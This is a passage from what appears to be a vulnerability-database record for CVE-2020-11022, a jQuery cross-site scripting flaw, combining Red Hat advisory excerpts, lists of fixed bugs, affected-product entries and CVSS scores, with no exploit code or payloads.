For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Solution:
For information on upgrading Ansible Tower, reference the Ansible Tower Upgrade and Migration Guide: https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/ index.html
- Description:
Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments.
The following packages have been upgraded to a later upstream version: ipa (4.8.7), softhsm (2.6.0), opendnssec (2.1.6). Bugs fixed (https://bugzilla.redhat.com/):
1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests 1430365 - [RFE] Host-group names command rename 1488732 - fake_mname in named.conf is no longer effective 1585020 - Enable compat tree to provide information about AD users and groups on trust agents 1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute 1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip 1651577 - [WebUI] IPA Error 3007: RequirmentError" while adding members in "User ID overrides" tab 1668082 - CVE-2018-20676 bootstrap: XSS in the tooltip data-viewport attribute 1668089 - CVE-2018-20677 bootstrap: XSS in the affix configuration target property 1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute 1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute 1701233 - [RFE] support setting supported signature methods on the token 1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection 1746830 - Memory leak during search of idview overrides 1750893 - Memory leak when slapi-nis return entries retrieved from nsswitch 1751295 - When sync-repl is enabled, slapi-nis can deadlock during retrochanglog trimming 1757045 - IDM Web GUI / IPA web UI: the ID override operation doesn't work in GUI (it works only from CLI) 1759888 - Rebase OpenDNSSEC to 2.1 1768156 - ERR - schemacompat - map rdlock: old way MAP_MONITOR_DISABLED 1777806 - When Service weight is set as 0 for server in IPA location "IPA Error 903: InternalError" is displayed 1793071 - CVE-2020-1722 ipa: No password length restriction leads to denial of service 1801698 - [RFE] Changing default hostgroup is too easy 1802471 - SELinux policy for ipa-custodia 1809835 - RFE: ipa group-add-member: number of failed should also be emphasized 1810154 - RFE: ipa-backup should compare locally and globally installed server roles 1810179 - ipa-client-install should name authselect backups and restore to that at uninstall time 1813330 - ipa-restore does not restart httpd 1816784 - KRA install fails if all KRA members are Hidden Replicas 1818765 - [Rebase] Rebase ipa to 4.8.6+ 1818877 - [Rebase] Rebase to softhsm 2.6.0+ 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1831732 - AVC avc: denied { dac_override } for comm="ods-enforcerd 1831935 - AD authentication with IdM against SQL Server 1832331 - [abrt] [faf] 389-ds-base: unknown function(): /usr/sbin/ns-slapd killed by 11 1833266 - [dirsrv] set 'nsslapd-enable-upgrade-hash: off' as this raises warnings 1834264 - BIND rebase: rebuild against new so version 1834909 - softhsm use-after-free on process exit 1845211 - Rebase bind-dyndb-ldap to 11.3 1845537 - IPA bind configuration issue 1845596 - ipa trust-add fails with 'Fetching domains from trusted forest failed' 1846352 - cannot issue certs with multiple IP addresses corresponding to different hosts 1846434 - Remove ipa-idoverride-memberof as superceded by ipa-server 4.8.7 1847999 - EPN does not ship its default configuration ( /etc/ipa/epn.conf ) in freeipa-client-epn 1849914 - FreeIPA - Utilize 256-bit AJP connector passwords 1851411 - ipa: typo issue in ipanthomedirectoryrive deffinition 1852244 - ipa-healthcheck inadvertently obsoleted in RHEL 8.2 1853263 - ipa-selinux package missing 1857157 - replica install failing with avc denial for custodia component 1858318 - AttributeError: module 'ssl' has no attribute 'SSLCertVerificationError' when upgrading ca-less ipa master 1859213 - AVC denial during ipa-adtrust-install --add-agents 1863079 - ipa-epn command displays 'exception: ConnectionRefusedError: [Errno 111] Connection refused' 1863616 - CA-less install does not set required permissions on KDC certificate 1866291 - EPN: enhance input validation 1866938 - ipa-epn fails to retrieve user data if some user attributes are not present 1868432 - Unhandled Python exception in '/usr/libexec/ipa/ipa-pki-retrieve-key' 1869311 - ipa trust-add fails with 'Fetching domains from trusted forest failed' 1870202 - File permissions of /etc/ipa/ca.crt differ between CA-ful and CA-less 1874015 - ipa hbacrule-add-service --hbacsvcs=sshd is not applied successfully for subdomain 1875348 - Valgrind reports a memory leak in the Schema Compatibility plugin. 1879604 - pkispawn logs files are empty
-
Description:
-
Fixed two jQuery vulnerabilities (CVE-2020-11022, CVE-2020-11023)
- Improved Ansible Tower's web service configuration to allow for processing more simultaneous HTTP(s) requests by default
- Updated several dependencies of Ansible Tower's User Interface to address (CVE-2020-7720, CVE-2020-7743, CVE-2020-7676)
- Updated to the latest version of python-psutil to address CVE-2019-18874
- Added several optimizations to improve performance for a variety of high-load simultaneous job launch use cases
- Fixed workflows to no longer prevent certain users from being able to edit approval nodes
- Fixed confusing behavior for social auth logins across distinct browser tabs
- Fixed launching of Job Templates that use prompt-at-launch Ansible Vault credentials
3
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-202004-2191", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "jdeveloper", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "jdeveloper", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "financial services data foundation", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "financial services analytical applications infrastructure", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6.0.0", }, { model: "hospitality simphony", scope: "eq", trust: 1, vendor: "oracle", version: "19.1.0-19.1.2", }, { model: "financial services market risk measurement and management", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.8", }, { model: "drupal", scope: "gte", trust: 1, vendor: "drupal", version: "8.7.0", }, { model: "financial services liquidity risk measurement and management", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "financial services analytical applications infrastructure", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "h300s", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "drupal", scope: "lt", trust: 1, vendor: "drupal", version: "8.7.14", }, { model: "communications billing and revenue management", scope: "eq", trust: 1, vendor: "oracle", version: "12.0.0.3.0", }, { model: "financial services analytical applications reconciliation framework", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.8", }, { model: "hospitality materials control", scope: "eq", trust: 1, vendor: "oracle", version: "18.1", }, { model: "hospitality simphony", scope: "lte", trust: 1, vendor: "oracle", version: "19.1.2", }, { model: "financial services data governance for us regulatory reporting", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.9", }, { model: "policy automation connector for siebel", scope: "eq", trust: 1, vendor: "oracle", version: "10.4.6", }, { model: "financial services analytical applications reconciliation framework", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "financial services basel regulatory capital basic", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.8", }, { model: "enterprise session border controller", scope: "eq", trust: 1, vendor: "oracle", version: "8.4", }, { model: "financial services institutional performance analytics", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "financial services profitability management", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "retail back office", scope: "eq", trust: 1, vendor: "oracle", version: "14.0", }, { model: "snapcenter", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "drupal", scope: "gte", trust: 1, vendor: "drupal", version: "8.8.0", }, { model: "financial services price creation and discovery", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "insurance data foundation", scope: "lte", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "banking digital experience", scope: "eq", trust: 1, vendor: "oracle", version: "20.1", }, { model: "insurance allocation manager for enterprise profitability", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "financial services analytical applications reconciliation framework", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "financial services liquidity risk measurement and management", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "insurance accounting analyzer", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.9", }, { model: "financial services loan loss forecasting and provisioning", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "financial services funds transfer pricing", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "insurance data foundation", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "agile product lifecycle management for process", scope: "eq", trust: 1, vendor: "oracle", version: "6.2.0.0", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 1, vendor: "oracle", version: "8.58", }, { model: "communications eagle application processor", scope: "gte", trust: 1, vendor: "oracle", version: "16.1.0", }, { model: "banking digital experience", scope: "eq", trust: 1, vendor: "oracle", version: "18.2", }, { model: "jquery", scope: "gte", trust: 1, vendor: "jquery", version: "1.2", }, { model: "financial services basel regulatory capital basic", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "financial services data governance for us regulatory reporting", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "financial services profitability management", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "drupal", scope: "gte", trust: 1, vendor: "drupal", version: "7.0", }, { model: "blockchain platform", scope: "lt", trust: 1, vendor: "oracle", version: "21.1.2", }, { model: "drupal", scope: "lt", trust: 1, vendor: "drupal", version: "8.8.6", }, { model: "communications diameter signaling router idih\\:", scope: "lte", trust: 1, vendor: "oracle", version: "8.2.2", }, { model: "fedora", scope: "eq", trust: 1, vendor: "fedoraproject", version: "31", }, { model: "financial services loan loss forecasting and provisioning", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "insurance insbridge rating and underwriting", scope: "gte", trust: 1, vendor: "oracle", version: "5.0.0.0", }, { model: "financial services regulatory reporting for european banking authority", scope: "lte", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "h300e", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "banking digital experience", scope: "eq", trust: 1, vendor: "oracle", version: "19.2", }, { model: "healthcare foundation", scope: "eq", trust: 1, vendor: "oracle", version: "7.2.0", }, { model: "siebel ui framework", scope: "eq", trust: 1, vendor: "oracle", version: "20.8", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.1.0.0", }, { model: "banking digital experience", scope: "lte", trust: 1, vendor: "oracle", version: "20.1", }, { model: "h700e", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "h500s", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "financial services funds transfer pricing", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "financial services price creation and discovery", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "healthcare foundation", scope: "eq", trust: 1, vendor: "oracle", version: "7.2.1", }, { model: "policy automation", scope: "lte", trust: 1, vendor: "oracle", version: "12.2.20", }, { model: "oncommand system manager", scope: "gte", trust: 1, vendor: "netapp", version: "3.0", }, { model: "financial services profitability management", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "financial services hedge management and ifrs valuations", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 1, vendor: "oracle", version: "12.4.0.0", }, { model: "banking digital experience", scope: "gte", trust: 1, vendor: "oracle", version: "18.1", }, { model: "policy automation", scope: "gte", trust: 1, vendor: "oracle", version: "12.2.0", }, { model: "financial services asset liability management", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "communications application session controller", scope: "eq", trust: 1, vendor: "oracle", version: "3.8m0", }, { model: "financial services basel regulatory capital internal ratings based approach", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "financial services market risk measurement and management", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "linux", scope: "eq", trust: 1, vendor: "debian", version: "9.0", }, { model: "banking digital experience", scope: "eq", trust: 1, vendor: "oracle", version: "18.3", }, { model: "financial services hedge management and ifrs valuations", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "10.3.6.0.0", }, { model: "fedora", scope: "eq", trust: 1, vendor: "fedoraproject", version: "33", }, { model: "financial services basel regulatory capital internal ratings based approach", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.8", }, { model: "drupal", scope: "lt", trust: 1, vendor: "drupal", version: "7.70", }, { model: "insurance insbridge rating and underwriting", scope: "eq", trust: 1, vendor: "oracle", version: "5.6.1.0", }, { model: "financial services balance sheet planning", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.8", }, { model: "financial services funds transfer pricing", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "retail returns management", scope: "eq", trust: 1, vendor: "oracle", version: "14.1", }, { model: "hospitality simphony", scope: "eq", trust: 1, vendor: "oracle", version: "18.1", }, { model: "insurance allocation manager for enterprise profitability", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.8", }, { model: "financial services asset liability management", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "insurance data foundation", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.6-8.1.0", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 1, vendor: "oracle", version: "8.56", }, { model: "financial services basel regulatory capital basic", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "financial services regulatory reporting for us federal reserve", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.9", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 1, vendor: "oracle", version: "8.57", }, { model: "leap", scope: "eq", trust: 1, vendor: "opensuse", version: "15.2", }, { model: "communications services gatekeeper", scope: "eq", trust: 1, vendor: "oracle", version: "7.0", }, { model: "financial services data integration hub", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "healthcare foundation", scope: "eq", trust: 1, vendor: "oracle", version: "7.3.0", }, { model: "insurance insbridge rating and underwriting", scope: "lte", trust: 1, vendor: "oracle", version: "5.6.0.0", }, { model: "hospitality simphony", scope: "eq", trust: 1, vendor: "oracle", version: "18.2", }, { model: "financial services data foundation", scope: "lte", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "policy automation for mobile devices", scope: "lte", trust: 1, vendor: "oracle", version: "12.2.20", }, { model: "storagetek acsls", scope: "eq", trust: 1, vendor: "oracle", version: "8.5.1", }, { model: "snap creator framework", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "financial services basel regulatory capital internal ratings based approach", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "h410c", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "banking digital experience", scope: "eq", trust: 1, vendor: "oracle", version: "18.1", }, { model: "policy automation for mobile devices", scope: "gte", trust: 1, vendor: "oracle", version: "12.2.0", }, { model: "jquery", scope: "lt", trust: 1, vendor: "jquery", version: "3.5.0", }, { model: "financial services liquidity risk management", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "oncommand insight", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "fedora", scope: "eq", trust: 1, vendor: "fedoraproject", version: "32", }, { model: "financial services analytical applications infrastructure", scope: "lte", trust: 1, vendor: "oracle", version: "8.1.0.0.0", }, { model: "h500e", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "h410s", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "log correlation engine", scope: "lt", trust: 1, vendor: "tenable", version: "6.0.9", }, { model: "communications diameter signaling router idih\\:", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.0", }, { model: "healthcare foundation", scope: "eq", trust: 1, vendor: "oracle", version: "7.1.1", }, { model: "financial services data integration hub", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "communications eagle application processor", scope: "lte", trust: 1, vendor: "oracle", version: "16.4.0", }, { model: "financial services asset liability management", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "financial services regulatory reporting for us federal reserve", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "max data", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "financial services institutional performance analytics", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "financial services regulatory reporting for european banking authority", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "jdeveloper", scope: "eq", trust: 1, vendor: "oracle", version: "11.1.1.9.0", }, { model: "retail returns management", scope: "eq", trust: 1, vendor: "oracle", version: "14.0", }, { model: "financial services loan loss forecasting and provisioning", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.8", }, { model: "agile product supplier collaboration for process", scope: "eq", trust: 1, vendor: "oracle", version: "6.2.0.0", }, { model: "financial services analytical applications infrastructure", scope: "lte", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "application testing suite", scope: "eq", trust: 1, vendor: "oracle", version: "13.3.0.1", }, { model: "retail back office", scope: "eq", trust: 1, vendor: "oracle", version: "14.1", }, { model: "hospitality simphony", scope: "gte", trust: 1, vendor: "oracle", version: "19.1.0", }, { model: "banking digital experience", scope: "eq", trust: 1, vendor: "oracle", version: "19.1", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "12.1.3.0.0", }, { model: "communications webrtc session controller", scope: "eq", trust: 1, vendor: "oracle", version: "7.2", }, { model: "communications billing and revenue management", scope: "eq", trust: 1, vendor: "oracle", version: "7.5.0.23.0", }, { model: "financial services hedge management and ifrs valuations", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.8", }, { model: "financial services institutional performance analytics", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "financial services data integration hub", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "leap", scope: "eq", trust: 1, vendor: "opensuse", version: "15.1", }, { model: "h700s", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "financial services liquidity risk measurement and management", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.8", }, { model: "retail customer management and segmentation foundation", scope: "eq", trust: 1, vendor: "oracle", version: "19.0", }, { model: "oncommand system manager", scope: "lte", trust: 1, vendor: "netapp", version: "3.1.3", }, ], sources: [ { db: "NVD", id: "CVE-2020-11022", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Red Hat", sources: [ { db: "PACKETSTORM", id: "159852", }, { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "161727", }, { db: "PACKETSTORM", id: "159876", }, { db: "PACKETSTORM", id: "160274", }, ], trust: 0.5, }, cve: "CVE-2020-11022", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "NONE", baseScore: 4.3, confidentialityImpact: "NONE", exploitabilityScore: 8.6, id: "CVE-2020-11022", impactScore: 2.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 1.1, vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N", version: "2.0", }, { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "NONE", baseScore: 4.3, confidentialityImpact: "NONE", exploitabilityScore: 8.6, id: "VHN-163559", impactScore: 2.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:M/AU:N/C:N/I:P/A:N", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", exploitabilityScore: 2.8, id: "CVE-2020-11022", impactScore: 2.7, integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", trust: 1, userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, { attackComplexity: "HIGH", attackVector: "NETWORK", author: "security-advisories@github.com", availabilityImpact: "NONE", baseScore: 6.9, baseSeverity: "MEDIUM", confidentialityImpact: "HIGH", exploitabilityScore: 1.6, id: "CVE-2020-11022", impactScore: 4.7, integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", trust: 1, userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N", version: "3.1", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2020-11022", trust: 1, value: "MEDIUM", }, { author: "security-advisories@github.com", id: "CVE-2020-11022", trust: 1, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-163559", trust: 0.1, value: "MEDIUM", }, { author: "VULMON", id: "CVE-2020-11022", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-163559", }, { db: "VULMON", id: "CVE-2020-11022", }, { db: "NVD", id: "CVE-2020-11022", }, { db: "NVD", id: "CVE-2020-11022", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. jQuery is an open source, cross-browser JavaScript library developed by American John Resig programmers. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. A cross-site scripting vulnerability exists in jQuery versions 1.2 through 3.5.0. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: pki-core:10.6 and pki-deps:10.6 security, bug fix, and enhancement update\nAdvisory ID: RHSA-2020:4847-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:4847\nIssue date: 2020-11-03\nCVE Names: CVE-2015-9251 CVE-2016-10735 CVE-2018-14040\n CVE-2018-14042 CVE-2019-8331 CVE-2019-10146\n CVE-2019-10179 CVE-2019-10221 CVE-2019-11358\n CVE-2020-1721 CVE-2020-11022 CVE-2020-11023\n CVE-2020-15720\n====================================================================\n1. Summary:\n\nAn update for the pki-core:10.6 and pki-deps:10.6 modules is now available\nfor Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe Public Key Infrastructure (PKI) Core contains fundamental packages\nrequired by Red Hat Certificate System. \n\nSecurity Fix(es):\n\n* jquery: Cross-site scripting via cross-domain ajax requests\n(CVE-2015-9251)\n\n* bootstrap: XSS in the data-target attribute (CVE-2016-10735)\n\n* bootstrap: Cross-site Scripting (XSS) in the collapse data-parent\nattribute (CVE-2018-14040)\n\n* bootstrap: Cross-site Scripting (XSS) in the data-container property of\ntooltip (CVE-2018-14042)\n\n* bootstrap: XSS in the tooltip or popover data-template attribute\n(CVE-2019-8331)\n\n* jquery: Prototype pollution in object's prototype leading to denial of\nservice, remote code execution, or property injection (CVE-2019-11358)\n\n* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter\nmethod (CVE-2020-11022)\n\n* jquery: Passing HTML containing <option> elements to manipulation methods\ncould result in untrusted code execution (CVE-2020-11023)\n\n* pki: Dogtag's python client does not validate certificates\n(CVE-2020-15720)\n\n* pki-core: Reflected XSS in 'path length' constraint field in CA's Agent\npage (CVE-2019-10146)\n\n* pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM\nagent page in authorize recovery tab (CVE-2019-10179)\n\n* pki-core: Reflected XSS in getcookies?url= endpoint in CA\n(CVE-2019-10221)\n\n* pki-core: KRA vulnerable to reflected XSS via the getPk12 page\n(CVE-2020-1721)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.3 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1376706 - restore SerialNumber tag in caManualRenewal xml\n1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests\n1406505 - KRA ECC installation failed with shared tomcat\n1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute\n1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip\n1666907 - CC: Enable AIA OCSP cert checking for entire cert chain\n1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute\n1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute\n1695901 - CVE-2019-10179 pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab\n1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection\n1706521 - CA - SubjectAltNameExtInput does not display text fields to the enrollment page\n1710171 - CVE-2019-10146 pki-core: Reflected XSS in 'path length' constraint field in CA's Agent page\n1721684 - Rebase pki-servlet-engine to 9.0.30\n1724433 - caTransportCert.cfg contains MD2/MD5withRSA as signingAlgsAllowed. \n1732565 - CVE-2019-10221 pki-core: Reflected XSS in getcookies?url= endpoint in CA\n1732981 - When nuxwdog is enabled pkidaemon status shows instances as stopped. \n1777579 - CVE-2020-1721 pki-core: KRA vulnerable to reflected XSS via the getPk12 page\n1805541 - [RFE] CA Certificate Transparency with Embedded Signed Certificate Time stamp\n1817247 - Upgrade to 10.8.3 breaks PKI Tomcat Server\n1821851 - [RFE] Provide SSLEngine via JSSProvider for use with PKI\n1822246 - JSS - NativeProxy never calls releaseNativeResources - Memory Leak\n1824939 - JSS: add RSA PSS support - RHEL 8.3\n1824948 - add RSA PSS support - RHEL 8.3\n1825998 - CertificatePoliciesExtDefault MAX_NUM_POLICIES hardcoded limit\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1842734 - CVE-2019-10179 pki-core: pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab [rhel-8]\n1842736 - CVE-2019-10146 pki-core: Reflected Cross-Site Scripting in 'path length' constraint field in CA's Agent page [rhel-8]\n1843537 - Able to Perform PKI CLI operations like cert request and approval without nssdb password\n1845447 - pkispawn fails in FIPS mode: AJP connector has secretRequired=\"true\" but no secret\n1850004 - CVE-2020-11023 jquery: Passing HTML containing <option> elements to manipulation methods could result in untrusted code execution\n1854043 - /usr/bin/PrettyPrintCert is failing with a ClassNotFoundException\n1854959 - ca-profile-add with Netscape extensions nsCertSSLClient and nsCertEmail in the profile gets stuck in processing\n1855273 - CVE-2020-15720 pki: Dogtag's python client does not validate certificates\n1855319 